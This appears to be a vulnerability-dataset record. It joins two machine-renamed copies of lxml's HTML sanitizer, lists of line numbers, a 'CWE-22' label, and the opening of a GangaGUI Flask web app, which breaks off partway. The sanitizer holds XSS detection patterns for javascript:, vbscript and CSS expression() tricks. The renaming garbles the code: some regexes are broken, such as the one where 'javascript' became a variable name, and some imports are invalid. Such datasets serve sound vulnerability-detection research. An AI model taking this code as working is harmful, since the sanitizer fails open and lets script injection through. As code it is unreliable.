VAR_62 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_36):
VAR_36 = self._substitute_comments('', VAR_36)
VAR_36 = VAR_36.replace('\\', '')
VAR_36 = VAR_6('', VAR_36)
VAR_36 = VAR_36.lower()
if 'javascript:' in VAR_36:
return True
if 'expression(' in VAR_36:
return True
if '@import' in VAR_36:
return True
if '</noscript' in VAR_36:
return True
if VAR_2(VAR_36):
return True
return False
def VAR_11(self, VAR_23):
VAR_66 = type(VAR_23)
if isinstance(VAR_23, VAR_72):
VAR_56 = fromstring(VAR_23)
else:
VAR_56 = copy.deepcopy(VAR_23)
self(VAR_56)
return _transform_result(VAR_66, VAR_56)
VAR_10 = CLASS_0()
VAR_11 = VAR_10.clean_html
VAR_12 = [
re.compile(r'(?P<VAR_90>https?://(?P<VAR_104>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_90>[a-z0-9._-]+@(?P<VAR_104>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_13 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_14 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_15 = ['nolink']
def FUNC_1(VAR_16, VAR_17=VAR_12,
VAR_18=VAR_13,
VAR_19=VAR_14,
VAR_20=VAR_15):
if VAR_16.tag in VAR_18:
return
VAR_63 = VAR_16.get('class')
if VAR_63:
VAR_63 = VAR_63.split()
for match_class in VAR_20:
if match_class in VAR_63:
return
for child in list(VAR_16):
FUNC_1(child, VAR_17=link_regexes,
VAR_18=avoid_elements,
VAR_19=avoid_hosts,
VAR_20=avoid_classes)
if child.tail:
VAR_21, VAR_96 = FUNC_2(
child.tail, VAR_17, VAR_19, VAR_22=VAR_16.makeelement)
if VAR_96:
child.tail = VAR_21
VAR_102 = VAR_16.index(child)
VAR_16[VAR_102+1:VAR_102+1] = VAR_96
if VAR_16.text:
VAR_21, VAR_85 = FUNC_2(
VAR_16.text, VAR_17, VAR_19, VAR_22=VAR_16.makeelement)
if VAR_85:
VAR_16.text = VAR_21
VAR_16[:0] = VAR_85
def FUNC_2(VAR_21, VAR_17, VAR_19, VAR_22):
VAR_64 = ''
VAR_38 = []
VAR_65 = 0
while 1:
VAR_86, VAR_87 = None, None
for regex in VAR_17:
VAR_97 = VAR_65
while 1:
VAR_103 = regex.search(VAR_21, pos=VAR_97)
if VAR_103 is None:
break
VAR_104 = VAR_103.group('host')
for host_regex in VAR_19:
if host_regex.search(VAR_104):
VAR_97 = VAR_103.end()
break
else:
break
if VAR_103 is None:
continue
if VAR_87 is None or VAR_103.start() < VAR_87:
VAR_86 = VAR_103
VAR_87 = VAR_103.start()
if VAR_86 is None:
if VAR_38:
assert not VAR_38[-1].tail
VAR_38[-1].tail = VAR_21
else:
assert not VAR_64
leading_text = VAR_21
break
VAR_61 = VAR_86.group(0)
VAR_88 = VAR_86.end()
if VAR_61.endswith('.') or VAR_61.endswith(','):
VAR_88 -= 1
VAR_61 = link[:-1]
VAR_89 = VAR_21[:VAR_86.start()]
if VAR_38:
assert not VAR_38[-1].tail
VAR_38[-1].tail = VAR_89
else:
assert not VAR_64
leading_text = VAR_89
VAR_57 = VAR_22('a')
VAR_57.set('href', VAR_61)
VAR_90 = VAR_86.group('body')
if not VAR_90:
VAR_90 = VAR_61
if VAR_90.endswith('.') or VAR_90.endswith(','):
VAR_90 = body[:-1]
VAR_57.text = VAR_90
VAR_38.append(VAR_57)
VAR_21 = text[VAR_88:]
return VAR_64, VAR_38
def FUNC_3(VAR_23, *VAR_24, **VAR_25):
VAR_66 = type(VAR_23)
if isinstance(VAR_23, VAR_72):
VAR_56 = fromstring(VAR_23)
else:
VAR_56 = copy.deepcopy(VAR_23)
FUNC_1(VAR_56, *VAR_24, **VAR_25)
return _transform_result(VAR_66, VAR_56)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_26 = ['pre', 'textarea', 'code']
VAR_27 = ['nobreak']
def FUNC_4(VAR_16, VAR_28=40,
VAR_18=VAR_26,
VAR_20=VAR_27,
VAR_29=VAR_70(0x200b)):
if VAR_16.tag in VAR_26:
return
VAR_63 = VAR_16.get('class')
if VAR_63:
VAR_91 = False
VAR_63 = VAR_63.split()
for avoid in VAR_20:
if avoid in VAR_63:
VAR_91 = True
break
if VAR_91:
return
if VAR_16.text:
VAR_16.text = FUNC_6(VAR_16.text, VAR_28, VAR_29)
for child in VAR_16:
FUNC_4(child, VAR_28=max_width,
VAR_18=avoid_elements,
VAR_20=avoid_classes,
VAR_29=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_28, VAR_29)
def FUNC_5(VAR_23, *VAR_24, **VAR_25):
VAR_66 = type(VAR_23)
VAR_56 = fromstring(VAR_23)
FUNC_4(VAR_56, *VAR_24, **VAR_25)
return _transform_result(VAR_66, VAR_56)
def FUNC_6(VAR_21, VAR_28, VAR_29):
VAR_67 = VAR_21.split()
for VAR_31 in VAR_67:
if len(VAR_31) > VAR_28:
VAR_98 = FUNC_7(VAR_31, VAR_28, VAR_29)
VAR_21 = VAR_21.replace(VAR_31, VAR_98)
return VAR_21
VAR_30 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_31, VAR_32, VAR_29):
VAR_68 = VAR_31
VAR_69 = ''
while len(VAR_31) > VAR_32:
VAR_92 = VAR_31[:VAR_32]
VAR_93 = list(VAR_30.finditer(VAR_92))
if VAR_93:
VAR_99 = VAR_93[-1]
if VAR_99.end() > VAR_32-10:
VAR_92 = VAR_31[:VAR_99.end()]
VAR_69 += VAR_92 + VAR_29
VAR_31 = word[len(VAR_92):]
VAR_69 += VAR_31
return VAR_69
|
from __future__ import absolute_import
import copy
import re
import .sys
try:
from urlparse import .urlsplit
from urllib import unquote_plus
except ImportError:
from urllib.parse import .urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
VAR_72
except NameError:
VAR_72 = chr
try:
VAR_73
except NameError:
VAR_73 = str
try:
VAR_74
except NameError:
VAR_74 = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
VAR_0 = re.compile(
r'expression\VAR_6*\(.*?\)', re.S|re.I).sub
VAR_1 = re.compile(
r'@\VAR_6*import', re.I).sub
VAR_2 = re.compile(
r'</?[a-zA-Z]+|\son[a-zA-Z]+\VAR_6*=',
*((re.ASCII,) if sys.version_info[0] >= 3 else ())).search
VAR_3 = re.compile(
r'^data:image/(.+);base64,', re.I).findall
VAR_4 = re.compile(
r'(VAR_36|jscript|livescript|vbscript|data|about|mocha):',
re.I).findall
VAR_5 = re.compile(r"(xml|svg)", re.I).findall
def FUNC_0(VAR_6):
VAR_34 = False
for image_type in VAR_3(VAR_6):
VAR_34 = True
if VAR_5(image_type):
return True
if VAR_34:
return False
return bool(VAR_4(VAR_6))
VAR_7 = re.compile(r'[\VAR_6\x00-\x08\x0B\x0C\x0E-\x19]+').sub
VAR_8 = re.compile(
r'\[if[\VAR_6\n\r]+.*?][\VAR_6\n\r]*>', re.I|re.S)
VAR_9 = etree.XPath(
"descendant-or-self::*[@VAR_38]")
VAR_10 = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class CLASS_0(object):
VAR_35 = True
VAR_36 = True
VAR_37 = True
VAR_38 = False
VAR_39 = None
VAR_40 = True
VAR_41 = True
VAR_42 = True
VAR_43 = True
VAR_44 = True
VAR_45 = True
VAR_46 = True
VAR_47 = True
VAR_48 = None
VAR_49 = None
VAR_50 = None
VAR_51 = True
VAR_52 = True
VAR_53 = defs.safe_attrs
VAR_54 = False
VAR_55 = ()
VAR_56 = {'iframe', 'embed'}
def __init__(self, **VAR_26):
VAR_75 = object()
for name, value in VAR_26.items():
VAR_96 = getattr(self, name, VAR_75)
if (VAR_96 is not None and VAR_96 is not True and VAR_96 is not False
and not isinstance(VAR_96, (frozenset, set, tuple, list))):
raise TypeError(
"Unknown parameter: %VAR_6=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in VAR_26:
self.inline_style = self.style
if VAR_26.get("allow_tags"):
if VAR_26.get("remove_unknown_tags"):
raise ValueError("It does not make sense to pass in both "
"allow_tags and remove_unknown_tags")
self.remove_unknown_tags = False
VAR_57 = dict(
script='src',
VAR_63='href',
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
a='href',
)
def __call__(self, VAR_58):
try:
VAR_97 = VAR_58.getroot
except AttributeError:
pass # Element instance
else:
VAR_58 = VAR_97() # ElementTree instance, instead of an element
xhtml_to_html(VAR_58)
for VAR_17 in VAR_58.iter('image'):
VAR_17.tag = 'img'
if not self.comments:
self.kill_conditional_comments(VAR_58)
VAR_50 = set(self.kill_tags or ())
VAR_48 = set(self.remove_tags or ())
VAR_49 = set(self.allow_tags or ())
if self.scripts:
VAR_50.add('script')
if self.safe_attrs_only:
VAR_53 = set(self.safe_attrs)
for VAR_17 in VAR_58.iter(etree.Element):
VAR_102 = VAR_17.attrib
for aname in VAR_102.keys():
if aname not in VAR_53:
del VAR_102[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
for VAR_17 in VAR_58.iter(etree.Element):
VAR_102 = VAR_17.attrib
for aname in VAR_102.keys():
if aname.startswith('on'):
del VAR_102[aname]
VAR_58.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
if not self.inline_style:
for VAR_17 in VAR_9(VAR_58):
VAR_107 = VAR_17.get('style')
VAR_86 = VAR_0('', VAR_107)
VAR_86 = VAR_1('', VAR_86)
if self._has_sneaky_javascript(VAR_86):
del VAR_17.attrib['style']
elif VAR_86 != VAR_107:
VAR_17.set('style', VAR_86)
if not self.style:
for VAR_17 in list(VAR_58.iter('style')):
if VAR_17.get('type', '').lower().strip() == 'text/javascript':
VAR_17.drop_tree()
continue
VAR_107 = VAR_17.text or ''
VAR_86 = VAR_0('', VAR_107)
VAR_86 = VAR_1('', VAR_86)
if self._has_sneaky_javascript(VAR_86):
VAR_17.text = '/* deleted */'
elif VAR_86 != VAR_107:
VAR_17.text = VAR_86
if self.comments:
VAR_50.add(etree.Comment)
if self.processing_instructions:
VAR_50.add(etree.ProcessingInstruction)
if self.style:
VAR_50.add('style')
if self.inline_style:
etree.strip_attributes(VAR_58, 'style')
if self.links:
VAR_50.add('link')
elif self.style or self.javascript:
for VAR_17 in list(VAR_58.iter('link')):
if 'stylesheet' in VAR_17.get('rel', '').lower():
if not self.allow_element(VAR_17):
VAR_17.drop_tree()
if self.meta:
VAR_50.add('meta')
if self.page_structure:
VAR_48.update(('head', 'html', 'title'))
if self.embedded:
for VAR_17 in list(VAR_58.iter('param')):
VAR_103 = VAR_17.getparent()
while VAR_103 is not None and VAR_103.tag not in ('applet', 'object'):
VAR_103 = VAR_103.getparent()
if VAR_103 is None:
VAR_17.drop_tree()
VAR_50.update(('applet',))
VAR_48.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
VAR_50.update(defs.frame_tags)
if self.forms:
VAR_48.add('form')
VAR_50.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
VAR_48.update(('blink', 'marquee'))
VAR_76 = []
VAR_77 = []
for VAR_17 in VAR_58.iter():
if VAR_17.tag in VAR_50:
if self.allow_element(VAR_17):
continue
VAR_77.append(VAR_17)
elif VAR_17.tag in VAR_48:
if self.allow_element(VAR_17):
continue
VAR_76.append(VAR_17)
if VAR_76 and VAR_76[0] == VAR_58:
VAR_17 = VAR_76.pop(0)
VAR_17.tag = 'div'
VAR_17.attrib.clear()
elif VAR_77 and VAR_77[0] == VAR_58:
VAR_17 = VAR_77.pop(0)
if VAR_17.tag != 'html':
VAR_17.tag = 'div'
VAR_17.clear()
VAR_77.reverse() # VAR_94 with innermost tags
for VAR_17 in VAR_77:
VAR_17.drop_tree()
for VAR_17 in VAR_76:
VAR_17.drop_tag()
if self.remove_unknown_tags:
if VAR_49:
raise ValueError(
"It does not make sense to pass in both VAR_49 and remove_unknown_tags")
VAR_49 = set(defs.tags)
if VAR_49:
if not self.comments:
VAR_49.add(etree.Comment)
if not self.processing_instructions:
VAR_49.add(etree.ProcessingInstruction)
VAR_85 = []
for VAR_17 in VAR_58.iter():
if VAR_17.tag not in VAR_49:
VAR_85.append(VAR_17)
if VAR_85:
if VAR_85[0] is VAR_58:
VAR_17 = VAR_85.pop(0)
VAR_17.tag = 'div'
VAR_17.attrib.clear()
for VAR_17 in VAR_85:
VAR_17.drop_tag()
if self.add_nofollow:
for VAR_17 in VAR_10(VAR_58):
if not self.allow_follow(VAR_17):
VAR_108 = VAR_17.get('rel')
if VAR_108:
if ('nofollow' in VAR_108
and ' nofollow ' in (' %VAR_6 ' % VAR_108)):
continue
VAR_108 = '%VAR_6 nofollow' % VAR_108
else:
VAR_108 = 'nofollow'
VAR_17.set('rel', VAR_108)
def FUNC_8(self, VAR_59):
return False
def FUNC_9(self, VAR_17):
if VAR_17.tag not in self._tag_link_attrs:
return False
VAR_78 = self._tag_link_attrs[VAR_17.tag]
if isinstance(VAR_78, (list, tuple)):
for one_attr in VAR_78:
VAR_60 = VAR_17.get(one_attr)
if not VAR_60:
return False
if not self.allow_embedded_url(VAR_17, VAR_60):
return False
return True
else:
VAR_60 = VAR_17.get(VAR_78)
if not VAR_60:
return False
return self.allow_embedded_url(VAR_17, VAR_60)
def FUNC_10(self, VAR_17, VAR_60):
if self.whitelist_tags is not None and VAR_17.tag not in self.whitelist_tags:
return False
VAR_79, VAR_80, VAR_81, VAR_82, VAR_83 = urlsplit(VAR_60)
VAR_80 = netloc.lower().split(':', 1)[0]
if VAR_79 not in ('http', 'https'):
return False
if VAR_80 in self.host_whitelist:
return True
return False
def FUNC_11(self, VAR_58):
VAR_84 = VAR_8.search
self._kill_elements(
VAR_58, lambda VAR_17: VAR_84(VAR_17.text),
etree.Comment)
def FUNC_12(self, VAR_58, VAR_61, VAR_62=None):
VAR_85 = []
for VAR_17 in VAR_58.iter(VAR_62):
if VAR_61(VAR_17):
VAR_85.append(VAR_17)
for VAR_17 in VAR_85:
VAR_17.drop_tree()
def FUNC_13(self, VAR_63):
VAR_86 = VAR_7('', unquote_plus(VAR_63))
if FUNC_0(VAR_86):
return ''
return VAR_63
VAR_64 = re.compile(r'/\*.*?\*/', re.S).sub
def FUNC_14(self, VAR_38):
VAR_38 = self._substitute_comments('', VAR_38)
VAR_38 = VAR_38.replace('\\', '')
VAR_38 = VAR_7('', VAR_38)
VAR_38 = VAR_38.lower()
if 'javascript:' in VAR_38:
return True
if 'expression(' in VAR_38:
return True
if '@import' in VAR_38:
return True
if '</noscript' in VAR_38:
return True
if VAR_2(VAR_38):
return True
return False
def VAR_12(self, VAR_24):
VAR_68 = type(VAR_24)
if isinstance(VAR_24, VAR_74):
VAR_58 = fromstring(VAR_24)
else:
VAR_58 = copy.deepcopy(VAR_24)
self(VAR_58)
return _transform_result(VAR_68, VAR_58)
VAR_11 = CLASS_0()
VAR_12 = VAR_11.clean_html
VAR_13 = [
re.compile(r'(?P<VAR_92>https?://(?P<VAR_106>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
re.compile(r'mailto:(?P<VAR_92>[a-z0-9._-]+@(?P<VAR_106>[a-z0-9_.-]+[a-z]))', re.I),
]
VAR_14 = ['textarea', 'pre', 'code', 'head', 'select', 'a']
VAR_15 = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
VAR_16 = ['nolink']
def FUNC_1(VAR_17, VAR_18=VAR_13,
VAR_19=VAR_14,
VAR_20=VAR_15,
VAR_21=VAR_16):
if VAR_17.tag in VAR_19:
return
VAR_65 = VAR_17.get('class')
if VAR_65:
VAR_65 = VAR_65.split()
for match_class in VAR_21:
if match_class in VAR_65:
return
for child in list(VAR_17):
FUNC_1(child, VAR_18=link_regexes,
VAR_19=avoid_elements,
VAR_20=avoid_hosts,
VAR_21=avoid_classes)
if child.tail:
VAR_22, VAR_98 = FUNC_2(
child.tail, VAR_18, VAR_20, VAR_23=VAR_17.makeelement)
if VAR_98:
child.tail = VAR_22
VAR_104 = VAR_17.index(child)
VAR_17[VAR_104+1:VAR_104+1] = VAR_98
if VAR_17.text:
VAR_22, VAR_87 = FUNC_2(
VAR_17.text, VAR_18, VAR_20, VAR_23=VAR_17.makeelement)
if VAR_87:
VAR_17.text = VAR_22
VAR_17[:0] = VAR_87
def FUNC_2(VAR_22, VAR_18, VAR_20, VAR_23):
VAR_66 = ''
VAR_40 = []
VAR_67 = 0
while 1:
VAR_88, VAR_89 = None, None
for regex in VAR_18:
VAR_99 = VAR_67
while 1:
VAR_105 = regex.search(VAR_22, pos=VAR_99)
if VAR_105 is None:
break
VAR_106 = VAR_105.group('host')
for host_regex in VAR_20:
if host_regex.search(VAR_106):
VAR_99 = VAR_105.end()
break
else:
break
if VAR_105 is None:
continue
if VAR_89 is None or VAR_105.start() < VAR_89:
VAR_88 = VAR_105
VAR_89 = VAR_105.start()
if VAR_88 is None:
if VAR_40:
assert not VAR_40[-1].tail
VAR_40[-1].tail = VAR_22
else:
assert not VAR_66
leading_text = VAR_22
break
VAR_63 = VAR_88.group(0)
VAR_90 = VAR_88.end()
if VAR_63.endswith('.') or VAR_63.endswith(','):
VAR_90 -= 1
VAR_63 = link[:-1]
VAR_91 = VAR_22[:VAR_88.start()]
if VAR_40:
assert not VAR_40[-1].tail
VAR_40[-1].tail = VAR_91
else:
assert not VAR_66
leading_text = VAR_91
VAR_59 = VAR_23('a')
VAR_59.set('href', VAR_63)
VAR_92 = VAR_88.group('body')
if not VAR_92:
VAR_92 = VAR_63
if VAR_92.endswith('.') or VAR_92.endswith(','):
VAR_92 = body[:-1]
VAR_59.text = VAR_92
VAR_40.append(VAR_59)
VAR_22 = text[VAR_90:]
return VAR_66, VAR_40
def FUNC_3(VAR_24, *VAR_25, **VAR_26):
VAR_68 = type(VAR_24)
if isinstance(VAR_24, VAR_74):
VAR_58 = fromstring(VAR_24)
else:
VAR_58 = copy.deepcopy(VAR_24)
FUNC_1(VAR_58, *VAR_25, **VAR_26)
return _transform_result(VAR_68, VAR_58)
FUNC_3.__doc__ = FUNC_1.__doc__
VAR_27 = ['pre', 'textarea', 'code']
VAR_28 = ['nobreak']
def FUNC_4(VAR_17, VAR_29=40,
VAR_19=VAR_27,
VAR_21=VAR_28,
VAR_30=VAR_72(0x200b)):
if VAR_17.tag in VAR_27:
return
VAR_65 = VAR_17.get('class')
if VAR_65:
VAR_93 = False
VAR_65 = VAR_65.split()
for avoid in VAR_21:
if avoid in VAR_65:
VAR_93 = True
break
if VAR_93:
return
if VAR_17.text:
VAR_17.text = FUNC_6(VAR_17.text, VAR_29, VAR_30)
for child in VAR_17:
FUNC_4(child, VAR_29=max_width,
VAR_19=avoid_elements,
VAR_21=avoid_classes,
VAR_30=break_character)
if child.tail:
child.tail = FUNC_6(child.tail, VAR_29, VAR_30)
def FUNC_5(VAR_24, *VAR_25, **VAR_26):
VAR_68 = type(VAR_24)
VAR_58 = fromstring(VAR_24)
FUNC_4(VAR_58, *VAR_25, **VAR_26)
return _transform_result(VAR_68, VAR_58)
def FUNC_6(VAR_22, VAR_29, VAR_30):
VAR_69 = VAR_22.split()
for VAR_32 in VAR_69:
if len(VAR_32) > VAR_29:
VAR_100 = FUNC_7(VAR_32, VAR_29, VAR_30)
VAR_22 = VAR_22.replace(VAR_32, VAR_100)
return VAR_22
VAR_31 = re.compile(r'[^a-z]', re.I)
def FUNC_7(VAR_32, VAR_33, VAR_30):
VAR_70 = VAR_32
VAR_71 = ''
while len(VAR_32) > VAR_33:
VAR_94 = VAR_32[:VAR_33]
VAR_95 = list(VAR_31.finditer(VAR_94))
if VAR_95:
VAR_101 = VAR_95[-1]
if VAR_101.end() > VAR_33-10:
VAR_94 = VAR_32[:VAR_101.end()]
VAR_71 += VAR_94 + VAR_30
VAR_32 = word[len(VAR_94):]
VAR_71 += VAR_32
return VAR_71
| [
1,
2,
4,
8,
10,
18,
24,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
75,
76,
77,
87,
89,
90,
91,
94,
97,
102,
103,
109,
112,
116,
119,
122,
125,
128,
131,
134,
137,
140,
143,
146,
149,
153,
157,
160,
163,
167,
171,
174,
183,
186,
188,
195,
198,
221,
233,
239,
240,
241,
245,
246,
251,
252,
253,
254,
255,
256,
257,
258,
261,
272,
274,
275,
279,
280,
282,
286,
299,
307,
308,
315,
326,
329,
344,
345,
348,
356,
357,
358,
366,
369,
370,
371,
378,
390,
392,
393,
398,
399,
404,
410,
417,
422,
446,
452,
456,
476,
481,
495,
506,
514,
516,
519,
522,
524,
530,
547,
550,
553,
562,
565,
566,
567,
568,
569,
572,
575,
577,
583,
585,
592,
595,
600,
630,
656,
667,
688,
697,
699,
700,
701,
702,
703,
706,
713,
716,
721,
724,
725,
747,
753,
761,
763,
772,
774,
775,
781,
782,
3,
4,
5,
6,
7,
105,
106,
107,
108,
109,
110,
111,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
195,
196,
197,
590,
591,
592,
593,
594,
595,
596,
597,
598,
599,
600,
601,
602,
603,
711,
712,
713,
714,
715,
716,
717,
718,
719,
720,
721,
722,
723,
263,
264,
265,
448,
449,
450,
454,
455,
456,
457,
458,
459,
478,
479,
480,
481,
482,
483,
484,
485,
497,
498,
499,
500,
501,
526,
527,
528,
529,
530,
531,
532,
533,
534,
535
] | [
1,
2,
4,
8,
10,
18,
24,
28,
33,
39,
40,
43,
44,
45,
46,
47,
48,
49,
50,
51,
52,
53,
54,
55,
56,
57,
58,
59,
60,
61,
62,
63,
64,
67,
68,
71,
75,
76,
77,
83,
85,
95,
97,
98,
101,
104,
109,
110,
116,
119,
123,
126,
129,
132,
135,
138,
141,
144,
147,
150,
153,
156,
160,
164,
167,
170,
174,
178,
181,
190,
193,
195,
202,
205,
228,
240,
246,
247,
248,
252,
253,
258,
259,
260,
261,
262,
263,
264,
265,
268,
279,
281,
282,
286,
287,
289,
293,
306,
314,
315,
322,
333,
336,
351,
352,
355,
363,
364,
365,
373,
376,
377,
378,
385,
397,
399,
400,
405,
406,
411,
417,
424,
429,
453,
459,
463,
483,
488,
502,
513,
521,
523,
526,
529,
531,
537,
554,
557,
560,
569,
572,
573,
574,
575,
576,
579,
582,
584,
590,
592,
599,
602,
607,
637,
663,
674,
695,
704,
706,
707,
708,
709,
710,
713,
720,
723,
728,
731,
732,
754,
760,
768,
770,
779,
781,
782,
788,
789,
3,
4,
5,
6,
7,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
124,
125,
126,
127,
128,
129,
130,
131,
132,
133,
134,
135,
136,
137,
138,
139,
140,
141,
142,
143,
144,
145,
146,
147,
148,
149,
150,
151,
152,
153,
154,
155,
156,
157,
158,
159,
160,
161,
162,
163,
164,
165,
166,
167,
168,
169,
170,
171,
172,
173,
174,
175,
176,
177,
178,
179,
180,
181,
182,
183,
184,
185,
186,
187,
188,
189,
190,
191,
192,
193,
194,
195,
196,
197,
198,
199,
200,
201,
202,
203,
204,
597,
598,
599,
600,
601,
602,
603,
604,
605,
606,
607,
608,
609,
610,
718,
719,
720,
721,
722,
723,
724,
725,
726,
727,
728,
729,
730,
270,
271,
272,
455,
456,
457,
461,
462,
463,
464,
465,
466,
485,
486,
487,
488,
489,
490,
491,
492,
504,
505,
506,
507,
508,
533,
534,
535,
536,
537,
538,
539,
540,
541,
542
] |
0CWE-22
| import os
import jwt
import json
import requests
import time
import select
import termios
import struct
import fcntl
import subprocess
import pty
import sys
import datetime
from functools import wraps
from werkzeug.utils import secure_filename
from werkzeug.security import generate_password_hash, check_password_hash
from flask import Flask, request, jsonify, render_template, flash, redirect, url_for, session, send_file, make_response
from flask_login import login_user, login_required, logout_user, current_user, UserMixin
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
from flask_socketio import SocketIO
from GangaGUI.gui.config import Config
# ******************** Initialisation of Flask App for GUI ******************** #
# GUI Flask App and set configuration from ./config.py file
gui = Flask(__name__)
gui.config.from_object(Config)
# Database object which is used to interact with the "gui.sqlite" in gangadir/gui folder
# NOTE: IT HAS NO RELATION WITH THE GANGA PERSISTENT DATABASE
db = SQLAlchemy(gui)
# Login manage for the view routes
login = LoginManager(gui)
login.login_view = "login"
login.login_message = "Please Login to Access this Page."
login.login_message_category = "warning"
# For websocket, for communication between frontend and backend
socketio = SocketIO(gui)
# ******************** The user class for database and authentication ******************** #
# ORM Class to represent Users - used to access the GUI & API resources
class User(UserMixin, db.Model):
__tablename__ = "users"
id = db.Column(db.Integer, primary_key=True)
public_id = db.Column(db.String(64), unique=True)
user = db.Column(db.String(32), unique=True)
password_hash = db.Column(db.String(64))
role = db.Column(db.String(32))
pinned_jobs = db.Column(db.Text)
def store_password_hash(self, password: str):
self.password_hash = generate_password_hash(password)
def verify_password(self, password: str) -> bool:
return check_password_hash(self.password_hash, password)
def generate_auth_token(self, expires_in_days: int = 5) -> str:
return jwt.encode(
{"public_id": self.public_id, "exp": datetime.datetime.utcnow() + datetime.timedelta(days=expires_in_days)},
gui.config["SECRET_KEY"], algorithm="HS256")
def __repr__(self):
return "User {}: {} (Public ID: {}, Role: {})".format(self.id, self.user, self.public_id, self.role)
# User Loader Function for Flask Login
@login.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
# ******************** Global Variables ******************** #
# Colors showed for different job statuses in the GUI based on Bootstrap CSS
status_color = {
"new": "info",
"completed": "success",
"completed_frozen" : "success",
"failed": "danger",
"failed_frozen" : "danger",
"running": "primary",
"submitted": "secondary",
"killed": "warning"
}
# Allowed extensions when uploading any files to GUI
ALLOWED_EXTENSIONS = {"txt", "py"}
# Variables to globally store plugins and actions
actions = {}
plugins = {}
# ******************** Run Before First Request ******************** #
# Execute before first request
@gui.before_first_request
def initial_run():
"""
This function runs before first request. It stores actions and plugins information from the ganga. It create default session cookies. If WEB_CLI is also started then it also starts a Ganga session.
"""
global actions, plugins
# Start ganga if WEB_CLI mode is True
if gui.config['WEB_CLI'] is True:
start_ganga(gui.config['INTERNAL_PORT'], args=gui.config["GANGA_ARGS"])
session["WEB_CLI"] = True
elif gui.config['INTERNAL_PORT'] is None:
gui.config['INTERNAL_PORT'] = os.environ['INTERNAL_PORT']
# If user is authenticated, log them out. This happens after a fresh start of the GUI server.
if current_user.is_authenticated:
logout_user()
# Create user session defaults
create_session_defaults()
# Check if internal server is online, exit after 20s of retrying
if not ping_internal():
print("INTERNAL SERVER UNAVAILABLE, TERMINATING...")
sys.exit(1)
# Get job actions and plugins information from ganga
try:
# Get actions and plugins data once
actions = query_internal_api("/internal/jobs/actions", "get")
plugins = query_internal_api("/internal/plugins", "get")
except Exception as err:
flash(str(err), "danger")
return redirect(url_for("dashboard"))
# ******************** View Routes ******************** #
# Login View
@gui.route("/login", methods=["GET", "POST"])
def login():
"""
Handles login route of the GUI.
"""
# If already authenticated, logout
if current_user.is_authenticated:
return redirect(url_for("dashboard"))
# Login user
if request.method == "POST":
# Form data
username = request.form.get("username")
password = request.form.get("password")
# Database query
user = User.query.filter_by(user=username).first()
# If valid user, login
if user and user.verify_password(password):
login_user(user, True)
flash("Login successful", "success")
return redirect(url_for("dashboard"))
flash("Error identifying the user", "danger")
# Get users from the database
users = User.query.all()
return render_template("login.html", title="Login", users=users)
# Logout View
@gui.route("/logout", methods=["GET"])
def logout():
"""
Logout user from GUI
"""
# Logout
if current_user.is_authenticated:
logout_user()
return redirect(url_for("login"))
# Dashboard view
@gui.route("/")
@login_required
def dashboard():
"""
Handles the dashboard route of the GUI.
"""
quick_statistics = {}
recent_jobs_info = []
pinned_jobs_info = []
try:
# Query overall statistics
quick_statistics = query_internal_api("/internal/jobs/statistics", "get")
# Query recent 10 jobs
recent_jobs_info = query_internal_api("/internal/jobs/recent", "get")
# Query pinned jobs
u = current_user
pinned_jobs_info = query_internal_api("/internal/jobs", "get", params={
"ids": u.pinned_jobs if u.pinned_jobs is not None else json.dumps([]),
"auto-validate-ids": True})
except Exception as err:
# Flash the error in the GUI
flash(str(err), "danger")
return render_template("dashboard.html",
title="Dashboard",
quick_statistics=quick_statistics,
recent_jobs_info=recent_jobs_info,
pinned_jobs_info=pinned_jobs_info,
status_color=status_color)
# Config view
@gui.route("/config", methods=["GET", "POST"])
@login_required
def config_page():
"""
Handles the config route of the GUI.
"""
full_config_info = []
config_info = []
section = None
# When GUI request for specific section
if request.method == "POST":
# Get section name for request form data
section = request.form.get("section")
section = None if section in ["", None] else section
try:
# Query full config
full_config_info = query_internal_api("/internal/config", "get")
# If asked for specific section, add only that for displaying
